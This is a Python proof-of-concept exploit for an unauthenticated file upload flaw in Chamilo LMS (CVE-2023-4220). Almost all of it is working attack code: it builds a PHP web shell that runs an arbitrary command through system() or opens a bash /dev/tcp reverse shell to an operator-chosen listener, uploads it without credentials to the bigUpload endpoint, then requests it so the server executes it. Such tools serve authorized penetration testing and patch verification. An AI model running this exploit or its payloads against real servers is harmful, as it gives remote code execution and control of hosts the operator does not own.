from __future__ import annotations

import argparse
import os

import requests

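# PoC for the unauthenticated file upload in Chamilo LMS's bundled bigUpload
# handler (CVE-2023-4220).  It writes a small PHP script locally, posts it to
# the vulnerable endpoint, then requests it back from the web-served upload
# directory to either run a single command or spawn a reverse shell.
# Use only against systems you are authorized to test.

# Colors for terminal output
RED = '\033[0;31m'
GREEN = '\033[0;32m'
YELLOW = '\033[0;33m'
RESET = '\033[0m'

# File name for the reverse shell script.  It is written to the current
# directory under this name and uploaded under the same name, so the trigger
# URL below depends on it.  Delete the local copy when you are done.
rev_shell_filename = "shell.php"

# Paths relative to the Chamilo web root used by this PoC.  The handler
# accepts a multipart field named "bigUploadFile" and stores it, as-is, in
# a directory that the web server serves back verbatim.
UPLOAD_PATH = "/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported"
FILES_PATH = "/main/inc/lib/javascript/bigupload/files/"


def php_single_quote(value: str) -> str:
    """Return *value* as a PHP single-quoted string literal.

    Inside PHP single quotes only ``\\`` and ``'`` are escape-significant;
    ``$``, ``\\n`` and friends are inert.  Escaping those two characters is
    therefore enough to keep an operator-supplied command from breaking out
    of the string and producing a corrupt (or unintended) PHP payload.
    """
    return "'" + value.replace("\\", "\\\\").replace("'", "\\'") + "'"


def _check_host(lhost: str) -> str:
    """Validate *lhost* as a hostname/IP made of safe characters.

    The value is spliced into a bash ``-c '...'`` argument, so anything beyond
    ASCII letters, digits, ``.``, ``-`` and ``:`` is rejected rather than
    escaped.  Returns the value unchanged; raises ``ValueError`` otherwise.
    """
    if not lhost or not all(c.isascii() and (c.isalnum() or c in ".-:") for c in lhost):
        raise ValueError(f"--localIP must be a plain hostname or IP address, got {lhost!r}")
    return lhost


def _check_port(lport: str) -> int:
    """Parse *lport* as a TCP port number (1-65535) or raise ``ValueError``."""
    try:
        port = int(lport)
    except (TypeError, ValueError):
        raise ValueError(f"--localPort must be an integer, got {lport!r}") from None
    if not 1 <= port <= 65535:
        raise ValueError(f"--localPort out of range: {port}")
    return port


def build_payload(command: str | None, lhost: str | None, lport: str | None) -> str:
    """Return the PHP source that will be uploaded.

    With a non-empty *command* the script runs it through ``system()`` so
    its output comes back in the HTTP response.  Otherwise it spawns a bash
    reverse shell to ``lhost:lport``; both must then be supplied.

    Args:
        command: Shell command to run on the target, or None/"" for a
            reverse shell.
        lhost: Listener host for the reverse shell (reverse-shell mode only).
        lport: Listener port for the reverse shell (reverse-shell mode only).

    Raises:
        ValueError: reverse-shell mode without a valid lhost/lport pair.
    """
    if command:
        return f"<?php system({php_single_quote(command)}); ?>"
    if not lhost or not lport:
        raise ValueError("reverse shell mode needs both --localIP and --localPort (or pass --command)")
    host = _check_host(lhost)
    port = _check_port(lport)
    # The bash one-liner is the same as the classic /dev/tcp reverse shell;
    # only the PHP quoting around it is hardened.
    shell_cmd = f"/bin/bash -c 'bash -i >& /dev/tcp/{host}/{port} 0>&1'"
    return f"<?php exec({php_single_quote(shell_cmd)}); ?>"


def upload_payload(host_url: str, path: str) -> requests.Response:
    """POST the local file at *path* to the bigUpload endpoint.

    No credentials are sent: the endpoint is reachable without a session,
    which is the vulnerability.  Raises ``requests.RequestException`` on a
    connection problem, timeout, or non-2xx status.
    """
    url = host_url.rstrip("/") + UPLOAD_PATH
    # The file object's name ("shell.php") becomes the multipart filename
    # and therefore the name under which the handler stores the upload.
    with open(path, "rb") as fh:
        response = requests.post(url, files={"bigUploadFile": fh}, timeout=30)
    response.raise_for_status()
    return response


def trigger_payload(host_url: str, filename: str, command: str | None) -> None:
    """Request the uploaded script so the web server executes it.

    In command mode the command's output is printed.  In reverse-shell mode
    the request blocks for as long as the shell lives, so only the connect
    phase is bounded by a timeout; a read timeout would tear the shell down.
    """
    url = host_url.rstrip("/") + FILES_PATH + filename
    if command:
        response = requests.get(url, timeout=(10, 60))
        if response.status_code != 200:
            # A 404 here usually means the handler stored the file somewhere
            # other than FILES_PATH (or did not store it at all).
            print(f"{RED}Unexpected HTTP {response.status_code} fetching {url}{RESET}")
        print(f"{GREEN}{response.text}{RESET}")
        return
    print(f"{YELLOW}You will get the shell, you can stop this script now.{RESET}")
    requests.get(url, timeout=(10, None))


def build_parser() -> argparse.ArgumentParser:
    """Return the command-line parser (kept separate so it is testable)."""
    # NOTE(review): the listing is titled CVE-2023-4226.py but this description
    # says CVE-2023-4220 -- confirm which identifier is intended.
    parser = argparse.ArgumentParser(description='POC for Chamilo LMS CVE-2023-4220')
    parser.add_argument('-u', '--url', required=True, help='Website where you want to upload the payload: http://host:port')
    parser.add_argument('-c', '--command', help='Command to execute on server')
    parser.add_argument('-lhost', '--localIP', help='Local IP for reverse shell')
    parser.add_argument('-lport', '--localPort', help='Local port for reverse shell')
    return parser


def main(argv: list[str] | None = None) -> int:
    """Entry point: build, upload and trigger the payload.

    Returns the process exit status (0 on success, 1 if the upload failed;
    argument problems exit with status 2 via argparse).
    """
    parser = build_parser()
    args = parser.parse_args(argv)
    try:
        payload = build_payload(args.command, args.localIP, args.localPort)
    except ValueError as exc:
        parser.error(str(exc))

    # Written locally first so the multipart upload carries the file name.
    with open(rev_shell_filename, "w", encoding="utf-8") as fh:
        fh.write(payload)

    try:
        upload_payload(args.url, rev_shell_filename)
    except requests.exceptions.RequestException as exc:
        print(f"{RED}File upload failed: {exc}{RESET}")
        return 1
    print(f"{GREEN}File {rev_shell_filename} uploaded successfully.{RESET}")

    trigger_payload(args.url, rev_shell_filename, args.command)
    return 0


if __name__ == "__main__":
    raise SystemExit(main())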